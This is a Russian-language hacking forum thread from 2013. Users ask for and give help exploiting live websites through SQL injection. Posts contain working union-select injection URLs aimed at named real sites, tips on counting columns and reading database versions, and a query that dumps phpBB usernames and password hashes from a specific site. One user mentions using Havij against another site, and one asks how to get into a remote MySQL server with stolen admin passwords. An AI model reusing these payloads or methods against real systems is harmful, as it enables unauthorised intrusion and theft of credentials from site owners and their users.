ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

21.08.2013, 00:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 705
Репутация:
0
|
|
Приветствую всех.
При запросе site.ru:3306 скачивается файл а в нем версия мускуля
F 5.0.32-Debian_7etch5 нz J>8>m**0 ,ў! U:a\)VU*mg@F яBad handshake
настройки мускула неправильные?
дальше что нить можно с этим сделать?
есть пароли админов но при вводе они не проходят ...
проверка по айпи может?
или еще как нить блокирует ?
|
|
|
|

21.08.2013, 00:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 23349
Репутация:
45
|
|
Сообщение от ishenko
ishenko said:
есть пароли админов но при вводе они не проходят ...
проверка по айпи может?
или еще как нить блокирует ?
Привязка пользователя к конкретному хосту вполне может быть, или там у каждого пользователя хост равен localhost. Если там нет phpmyadmin'a, или ему подобному, подключиться удаленно не получится.
|
|
|
|

21.08.2013, 12:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
Я уже задолбался подбирать столбцы
Код:
Code:
http://www.smz.donetsk.ua/index.php?id=2782&show=news&newsid=-108450%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+
http://www.ntvplus.ru/channels/channel.xl?id=45409%27
народ, скажите что не так
|
|
|
|

21.08.2013, 22:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 44130
Репутация:
26
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Я уже задолбался подбирать столбцы
Код:
Code:
http://www.smz.donetsk.ua/index.php?id=2782&show=news&newsid=-108450%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+
http://www.ntvplus.ru/channels/channel.xl?id=45409%27
народ, скажите что не так
SQL-injection Полный faq от Dr.Zero. Пункт "подбор столбцов"
http://www.smz.do[lalala]netsk.ua/index.php?id=2782&show=news&newsid=108450 order by 3 -- 1
|
|
|
|

22.08.2013, 12:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
Сообщение от Ravenous
Ravenous said:
SQL-injection Полный faq от Dr.Zero. Пункт "подбор столбцов"
http://www.smz.do[lalala]netsk.ua/index.php?id=2782&show=news&newsid=108450 order by 3 -- 1
Разочарование при вводе version() - I don't like you...
|
|
|
|

22.08.2013, 13:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 29020
Репутация:
55
|
|
хакир ну и чо ? то что фильт на version() это еще ничего не значит, самое главное то нормально выводится. и саму версию бд можно вывести так @@version
|
|
|
|

23.08.2013, 11:55
|
|
Guest
Сообщений: n/a
Провел на форуме: 6848
Репутация:
10
|
|
Скажите что не так?
http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9+from+phpbb_users
Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы
5.0.92-log:trunovc7_tr@localhost:trunovc7_loy
|
|
|
|

23.08.2013, 14:28
|
|
Новичок
Регистрация: 13.06.2008
Сообщений: 1
Провел на форуме: 8301
Репутация:
0
|
|
Нашел единственную уязвимость на сайте.Начал анализ
Нашел мне такую базу данных, в хавидж жму Get tables внутри ничего не вылезает, вот название Current DB: }NLrxf}x{f} ffw иероглифы какие то и скобки.Скажите что делать?
|
|
|

23.08.2013, 14:52
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме: 324402
Репутация:
22
|
|
Сообщение от danil7493
danil7493 said:
Скажите что не так?
http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9+from+phpbb_users
Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы
5.0.92-log:trunovc7_tr@localhost:trunovc7_loy
Код HTML:
HTML:
http://www.trunov.com/news.php?newsid=-237+UNION+SELECT+1,CONCAT_ws(0x3a,username,user_password),3,4,5,6,7,8,9+FROM+trunovc7_forum.phpbb_users+LIMIT+1,1--&page=1
|
|
|

23.08.2013, 15:06
|
|
Новичок
Регистрация: 13.06.2008
Сообщений: 1
Провел на форуме: 8301
Репутация:
0
|
|
Помогите пожалуйста сначало я вывел базу, она не открывалась.Теперь ничего не делается.Люди посоветуйте через Havij иньекцию делал
вот тут уязвимость
http://rp-gameworld.ru/index.php?c=registration&action=reg
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|